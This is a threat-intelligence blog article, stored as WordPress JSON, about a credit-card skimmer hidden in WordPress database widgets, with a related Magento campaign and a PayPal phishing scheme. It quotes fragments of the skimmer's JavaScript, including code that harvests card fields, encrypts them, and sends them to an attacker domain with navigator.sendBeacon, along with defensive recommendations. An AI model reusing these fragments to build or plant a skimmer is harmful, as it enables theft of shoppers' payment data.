{"id":20029,"date":"2025-02-13T09:00:04","date_gmt":"2025-02-13T02:00:04","guid":{"rendered":"https:\/\/fpt-is.com\/en\/?post_type=goc_nhin_so&#038;p=20029"},"modified":"2025-02-17T13:54:45","modified_gmt":"2025-02-17T06:54:45","slug":"warning-new-skimmer-malware-targets-wordpress-users-to-steal-credit-cards-2","status":"publish","type":"goc_nhin_so","link":"https:\/\/fpt-is.com\/en\/insights\/warning-new-skimmer-malware-targets-wordpress-users-to-steal-credit-cards-2\/","title":{"rendered":"Warning: New skimmer malware targets WordPress users to steal credit cards"},"content":{"rendered":"<div id=\"post-content-wrapper\" class=\"prose prose-base mx-auto mb-10 min-h-30 break-words dark:prose-dark lg:prose-lg\">\n<h2 id=\"heading-overview\" class=\"permalink-heading\">Overview<\/h2>\n<p>Recently, information security researchers discovered a new form of skimmer malware attack that very cleverly steals credit card information, targeting e-commerce websites using WordPress. The attackers insert JavaScript code into the database related to the Content Management System (CMS) to steal sensitive payment information such as credit card numbers, expiration dates, CVV numbers, and payment details.<\/p>\n<h2 id=\"heading-attack-method\" class=\"permalink-heading\">Attack Method<\/h2>\n<p>According to Puja Srivastava, a researcher from Sucuri, the malware is only activated through the checkout page by stealing data from existing payment information fields or by creating a fake credit card information entry form.<\/p>\n<p>According to the security company owned by GoDaddy, they discovered the malware embedded in the\u00a0<strong>wp_options<\/strong>\u00a0table in WordPress, specifically in the following row:<\/p>\n<ul>\n<li>option_name: widget_block<\/li>\n<li>option_value: Contains obfuscated JavaScript code<\/li>\n<\/ul>\n<p>By inserting into the database rather than affecting additional files or plugins, this malware avoids detection by regular file scanning tools, allowing it to remain hidden on the compromised WordPress site. To carry out the attack, the attacker uses the WordPress admin panel (wp-admin \u2192 widgets) to insert JavaScript code into the HTML block widget.<button type=\"button\" aria-label=\"Expand image: HTML block widget\" data-rmiz-btn-zoom=\"\"><\/button><\/p>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/html-block-widget-596x600-1739157361.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20030 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/html-block-widget-596x600-1739157361.png\" alt=\"New skimmer malware FPT IS 1\" width=\"596\" height=\"600\" \/><\/a><\/p>\n<p>The following script will check if the website URL contains the string &#8220;<strong>checkout<\/strong>&#8221; but does not contain the string &#8220;<strong>cart<\/strong>&#8220;. This ensures that the malware only activates when the user is about to submit their payment information.<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\"><span class=\"hljs-keyword\">const<\/span> _0x232f96 = <span class=\"hljs-string\">'\/checkout'<\/span>;\r\n<span class=\"hljs-keyword\">if<\/span> (<span class=\"hljs-built_in\">window<\/span>.location.toString().toLowerCase().search(<span class=\"hljs-string\">''<\/span> + _0x232f96) !== <span class=\"hljs-number\">-1<\/span>) {...}\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>It will create a fake payment form that closely mimics the legitimate checkout process. This form will include fields for credit card number, expiration date, CVV number, and billing information. If a valid payment form already exists on the website, the script will collect the information entered into the existing fields in real-time.<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\"><span class=\"hljs-keyword\">const<\/span> fakeForm = <span class=\"hljs-string\">'&lt;div id=\"stripe-payment-form-wrap\"&gt;...&lt;\/div&gt;'<\/span>;\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>This method ensures that the user is unaware they are providing sensitive payment information to the attacker.<\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/sensitive-data-1739157473.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20031 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/sensitive-data-1739157473.png\" alt=\"New skimmer malware FPT IS 2\" width=\"2094\" height=\"988\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/sensitive-data-1739157473.png 2094w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/sensitive-data-1739157473-700x330.png 700w\" sizes=\"(max-width: 2094px) 100vw, 2094px\" \/><\/a><\/span><button type=\"button\" aria-label=\"Expand image: sensitive data\" data-rmiz-btn-zoom=\"\"><\/button><\/span><\/p>\n<p>By stealing payment information from existing fields instead of creating a new payment form, it ensures compatibility with various payment systems, as shown in the following script:<\/p>\n<p>&nbsp;<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\"><span class=\"hljs-function\"><span class=\"hljs-keyword\">function<\/span> <span class=\"hljs-title\">_0x50efa4<\/span>() <\/span>{\r\n        _0x5ab8c6.Number = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x3c48c0)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x3c48c0).value.replaceAll(<span class=\"hljs-string\">' '<\/span>, <span class=\"hljs-string\">''<\/span>)\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.CVV = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x4cbdac)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x4cbdac).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.Expiration = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x526fa8)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x526fa8).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.Address = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x72d8fc)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x72d8fc).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.FullName = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x37276b)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x37276b).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.City = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x4e4454)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x4e4454).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n        _0x5ab8c6.Zip = <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x31755f)\r\n          ? <span class=\"hljs-built_in\">document<\/span>.getElementById(_0x31755f).value\r\n          : <span class=\"hljs-string\">''<\/span>\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<p>And to avoid detection while stealing, making it hard to analyze and sending data back to the attacker&#8217;s server, the malware uses Base64 encoding combined with AES-CBC encryption. This makes the data look harmless when transmitted.<\/p>\n<p>&nbsp;<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\"><span class=\"hljs-keyword\">async<\/span> <span class=\"hljs-function\"><span class=\"hljs-keyword\">function<\/span> <span class=\"hljs-title\">_0x233872<\/span>(<span class=\"hljs-params\">_0x521845, _0x5e6977, _0xd6a8ef<\/span>) <\/span>{\r\n        <span class=\"hljs-keyword\">try<\/span> {\r\n          <span class=\"hljs-keyword\">var<\/span> _0x5180cb = <span class=\"hljs-built_in\">Uint8Array<\/span>.from(atob(_0x521845), <span class=\"hljs-function\">(<span class=\"hljs-params\">_0x47cd28<\/span>) =&gt;<\/span>\r\n              _0x47cd28.charCodeAt(<span class=\"hljs-number\">0<\/span>)\r\n            ),\r\n            _0x25deba = <span class=\"hljs-built_in\">Uint8Array<\/span>.from(atob(_0x5e6977), <span class=\"hljs-function\">(<span class=\"hljs-params\">_0x45785d<\/span>) =&gt;<\/span>\r\n              _0x45785d.charCodeAt(<span class=\"hljs-number\">0<\/span>)\r\n            ),\r\n            _0x152dd3 = <span class=\"hljs-keyword\">await<\/span> crypto.subtle.importKey(\r\n              <span class=\"hljs-string\">'raw'<\/span>,\r\n              _0x5180cb,\r\n              <span class=\"hljs-string\">'AES-CBC'<\/span>,\r\n              <span class=\"hljs-literal\">false<\/span>,\r\n              [<span class=\"hljs-string\">'encrypt'<\/span>]\r\n            ),\r\n            _0x3f060d = <span class=\"hljs-keyword\">await<\/span> crypto.subtle.encrypt(\r\n              {\r\n                <span class=\"hljs-attr\">name<\/span>: <span class=\"hljs-string\">'AES-CBC'<\/span>,\r\n                <span class=\"hljs-attr\">iv<\/span>: _0x25deba,\r\n              },\r\n              _0x152dd3,\r\n              <span class=\"hljs-keyword\">new<\/span> TextEncoder().encode(_0xd6a8ef)\r\n            )\r\n          <span class=\"hljs-keyword\">const<\/span> _0x4d0c53 = btoa(\r\n            <span class=\"hljs-built_in\">String<\/span>.fromCharCode.apply(<span class=\"hljs-literal\">null<\/span>, <span class=\"hljs-keyword\">new<\/span> <span class=\"hljs-built_in\">Uint8Array<\/span>(_0x3f060d))\r\n          )\r\n          <span class=\"hljs-keyword\">return<\/span> _0x4d0c53\r\n        } <span class=\"hljs-keyword\">catch<\/span> (_0x2dc142) {\r\n          <span class=\"hljs-keyword\">throw<\/span> _0x2dc142\r\n        }\r\n      }\r\n    }\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<p>The malware, after encrypting and sending data to the attacker&#8217;s server using the\u00a0<strong>navigator.sendBeacon<\/strong> function, avoids disrupting the user experience.<\/p>\n<p>&nbsp;<\/p>\n<div>\n<div>\n<pre><code class=\"lang-javascript\">navigator.sendBeacon(atob(<span class=\"hljs-string\">'aHR0cHM6Ly92YWxoYWZhdGhlci54eXo='<\/span>), encryptedData);\r\n<\/code><\/pre>\n<\/div>\n<\/div>\n<p>&nbsp;<\/p>\n<p>Information about the domain servers is as follows:<\/p>\n<ul>\n<li>valhafather[.]xyz<\/li>\n<\/ul>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/1748da96-b9f0-490e-ba49-8d5026030a80-1739157640.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20032 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/1748da96-b9f0-490e-ba49-8d5026030a80-1739157640.png\" alt=\"New skimmer malware FPT IS 3\" width=\"1302\" height=\"841\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/1748da96-b9f0-490e-ba49-8d5026030a80-1739157640.png 1302w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/1748da96-b9f0-490e-ba49-8d5026030a80-1739157640-700x452.png 700w\" sizes=\"(max-width: 1302px) 100vw, 1302px\" \/><\/a><\/p>\n<ul>\n<li>fqbe23[.]xyz<\/li>\n<\/ul>\n<p><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20033 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650.png\" alt=\"New skimmer malware FPT IS 4\" width=\"1300\" height=\"864\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650.png 1300w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650-700x465.png 700w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/671f52b2-6db5-4239-9369-001faf6a2a19-1739157650-406x271.png 406w\" sizes=\"(max-width: 1300px) 100vw, 1300px\" \/><\/a><\/p>\n<h2><\/h2>\n<h2 id=\"heading-previous-attack-campaigns\" class=\"permalink-heading\">Previous attack campaigns<\/h2>\n<p>Previously, in November 2024, researchers at Sucuri also discovered a similar attack campaign using malware written in JavaScript. This malware creates fake credit card information forms or steals data that users enter on the payment page of websites using Magento. The attack method is similar to that on websites using WordPress, with the difference being in how the collected information is obfuscated. The malware used on Magento converts the stolen information into JSON format, then encrypts it with XOR using the key &#8220;script&#8221; and finally encodes it with BASE64. The information is then sent to the server\u00a0<strong>staticfonts[.]com.<\/strong><\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fake-credit-card-form-example-1739157671.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20034 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fake-credit-card-form-example-1739157671.png\" alt=\"New skimmer malware FPT IS 5\" width=\"934\" height=\"524\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fake-credit-card-form-example-1739157671.png 934w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fake-credit-card-form-example-1739157671-700x393.png 700w\" sizes=\"(max-width: 934px) 100vw, 934px\" \/><\/a><\/span><button type=\"button\" aria-label=\"Expand image: Fake credit card form example\" data-rmiz-btn-zoom=\"\"><\/button><\/span><\/p>\n<p>A phishing campaign also targets PayPal users to take over their accounts. In a report by Carl Windsor, CISO of Fortinet, this phishing campaign is very sophisticated, using PayPal&#8217;s URL to deceive users.<\/p>\n<p>Accordingly, users will receive an email requesting a payment of nearly $2,200. When the victim clicks the &#8220;Pay Now&#8221; button and enters their PayPal account information, the account will be linked to the attacker&#8217;s email address. The dangerous aspect of this campaign is that it uses PayPal&#8217;s email address (<a class=\"autolinkedURL autolinkedURL-email\" href=\"mailto:service@paypal.com\" target=\"_blank\" rel=\"noopener\">service@paypal.com<\/a>) and contains a legitimate login URL., making it easy to bypass security checks. The attacker can also easily create these emails by registering a test MS365 domain, which is free for three months.<\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig01-paypal-phishing-1739157692.jpeg\"><img decoding=\"async\" class=\"aligncenter wp-image-20035 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig01-paypal-phishing-1739157692.jpeg\" alt=\"New skimmer malware FPT IS 6\" width=\"1245\" height=\"997\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig01-paypal-phishing-1739157692.jpeg 1245w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig01-paypal-phishing-1739157692-700x561.jpeg 700w\" sizes=\"(max-width: 1245px) 100vw, 1245px\" \/><\/a><\/span><button type=\"button\" aria-label=\"Expand image\" data-rmiz-btn-zoom=\"\"><\/button><\/span><\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig04-paypal-phishing-1739157714.jpeg\"><img decoding=\"async\" class=\"aligncenter wp-image-20036 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/fig04-paypal-phishing-1739157714.jpeg\" alt=\"New skimmer malware FPT IS 7\" width=\"441\" height=\"624\" \/><\/a><\/span><button type=\"button\" aria-label=\"Expand image\" data-rmiz-btn-zoom=\"\"><\/button><\/span><\/p>\n<p>Recently, there have also been cases where attackers use transaction simulation techniques to steal cryptocurrency from victims&#8217; wallets, making it even more difficult to detect and prevent fraud online.<\/p>\n<p><span data-rmiz=\"\"><span data-rmiz-content=\"found\"><a href=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/example-1024x587-1739157726.png\"><img decoding=\"async\" class=\"aligncenter wp-image-20037 size-full\" src=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/example-1024x587-1739157726.png\" alt=\"New skimmer malware FPT IS 8\" width=\"1024\" height=\"587\" srcset=\"https:\/\/cdn.fpt-is.com\/en\/sites\/3\/example-1024x587-1739157726.png 1024w, https:\/\/cdn.fpt-is.com\/en\/sites\/3\/example-1024x587-1739157726-700x401.png 700w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/span><button type=\"button\" aria-label=\"Expand image\" data-rmiz-btn-zoom=\"\"><\/button><\/span><\/p>\n<h2 id=\"heading-impact\" class=\"permalink-heading\">Impact<\/h2>\n<p>Attackers will use the stolen credit card information to fund malicious ad campaigns on social media, purchase malware or Malware-as-a-Service (MaaS) services, or buy gift cards because they are very difficult to trace.<\/p>\n<p>Moreover, businesses and individual entrepreneurs are also affected, not only in terms of reputation but also economically.<\/p>\n<h2 id=\"heading-recommendations\" class=\"permalink-heading\">Recommendations<\/h2>\n<p>To prevent these attacks,\u00a0<strong>FPT Threat Intelligence<\/strong>\u00a0recommends:<\/p>\n<ul>\n<li>For websites using WordPress, access the WordPress admin panel, go to\u00a0<strong>wp-admin \u2192 Appearance \u2192 Widgets<\/strong>. Then check all\u00a0<strong>Custom HTML<\/strong>\u00a0to find and remove any suspicious\u00a0<strong>&lt;script&gt;<\/strong>\u00a0tags.<\/li>\n<li>Regularly update and patch vulnerabilities in plugins and themes.<\/li>\n<li>Manage admin accounts strictly, use strong passwords, enable two-factor authentication, and change passwords regularly.<\/li>\n<li>Monitor changes and the integrity of files on the system to detect any abnormalities as early as possible.<\/li>\n<li>Implement security solutions like a Web Application Firewall (WAF) to detect and block dangerous transmissions and prevent external attacks on the system.<\/li>\n<li>Regarding recent phishing activities, users need to be cautious with the information they receive and carefully check payment details.<\/li>\n<li>Raise user awareness and regularly conduct phishing drills with new and more sophisticated methods.<\/li>\n<\/ul>\n<h2 id=\"heading-references\" class=\"permalink-heading\">References<\/h2>\n<ol>\n<li><a href=\"https:\/\/thehackernews.com\/2025\/01\/wordpress-skimmers-evade-detection-by.html\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/thehackernews.com\/2025\/01\/wordpress-skimmers-evade-detection-by.html<\/a><\/li>\n<li><a href=\"https:\/\/blog.sucuri.net\/2025\/01\/stealthy-credit-card-skimmer-targets-wordpress-checkout-pages-via-database-injection.html\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/blog.sucuri.net\/2025\/01\/stealthy-credit-card-skimmer-targets-wordpress-checkout-pages-via-database-injection.html<\/a><\/li>\n<li><a href=\"https:\/\/blog.sucuri.net\/2024\/11\/credit-card-skimmer-malware-targeting-magento-checkout-pages.html\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/blog.sucuri.net\/2024\/11\/credit-card-skimmer-malware-targeting-magento-checkout-pages.html<\/a><\/li>\n<li><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/phish-free-paypal-phishing\" target=\"_blank\" rel=\"noopener nofollow\">https:\/\/www.fortinet.com\/blog\/threat-research\/phish-free-paypal-phishing<\/a><\/li>\n<\/ol>\n<\/div>\n<div class=\"-mt-5 mb-10\">\n<table style=\"border-collapse: collapse; width: 100%;\">\n<tbody>\n<tr>\n<td style=\"width: 100%;\"><strong>Exclusive article by FPT IS Technology Experts<\/strong><\/p>\n<p><em>Vu Nhat Lam \u2013 FPT IS Cyber Security Center<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n","protected":false},"author":21,"featured_media":20227,"parent":0,"template":"","nang_luc":[],"danh_muc_goc_nhin_so":[],"dich_vu":[],"linh_vuc":[],"platform":[],"san_pham":[],"the_goc_nhin_so":[],"class_list":["post-20029","goc_nhin_so","type-goc_nhin_so","status-publish","has-post-thumbnail","hentry"],"acf":[],"_links":{"self":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so\/20029","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/goc_nhin_so"}],"about":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/types\/goc_nhin_so"}],"author":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/users\/21"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media\/20227"}],"wp:attachment":[{"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/media?parent=20029"}],"wp:term":[{"taxonomy":"nang_luc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/nang_luc?post=20029"},{"taxonomy":"danh_muc_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/danh_muc_goc_nhin_so?post=20029"},{"taxonomy":"dich_vu","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/dich_vu?post=20029"},{"taxonomy":"linh_vuc","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/linh_vuc?post=20029"},{"taxonomy":"platform","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/platform?post=20029"},{"taxonomy":"san_pham","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/san_pham?post=20029"},{"taxonomy":"the_goc_nhin_so","embeddable":true,"href":"https:\/\/fpt-is.com\/en\/wp-json\/wp\/v2\/the_goc_nhin_so?post=20029"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}